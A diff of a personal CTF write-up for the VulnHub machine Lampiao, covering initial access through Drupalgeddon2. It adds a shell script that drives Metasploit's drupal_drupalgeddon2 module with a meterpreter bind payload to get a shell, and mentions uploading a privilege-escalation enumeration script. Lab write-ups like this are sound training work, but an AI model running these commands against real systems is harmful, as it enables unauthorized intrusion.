PortWhisperer/CTFWriteups/Lampiao.md

 #InitialAccess
-Searchsploit contained several entries for "DrupalGeddon"

-msfconsole
-search drupal
+Searchsploit contained several entries for "DrupalGeddon".
+One of them had a .rb extension, implying it was a msf module, so I executed ``` msfconsole ``` followed by ```search drupal```, which confirmed a module did exist.

+Low priv shell can be automated as follows in (Kali with metasploit framework)
 ```
+#lampiao_low_priv.sh
+#/bin/bash
+rhost=${1}
 msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2;\
 	set payload php/meterpreter/bind_tcp;\
 	set rport 1898;\
 	set rhost $tgt;\
 	exploit;\
 	cd ~/toolz;\
-upload ~/toolz/les.sh /tmp/"
+	# upload ~/toolz/les.sh /tmp/" # enumeration script
 ```

  #Discovery
 After  executing a large number of manual enumeration steps, checked other guides.
-The majority of users achieved root by using the Linux Exploit Suggester script, which feels sort of cheap compared to the typically OffSec box (granted, this is vanilla vuln-hub).
+The majority of users achieved root by using the Linux Exploit Suggester script (les.sh), which feels sort of cheap compared to the typically OffSec box (granted, this is vanilla vuln-hub).

 uname -a output
 ```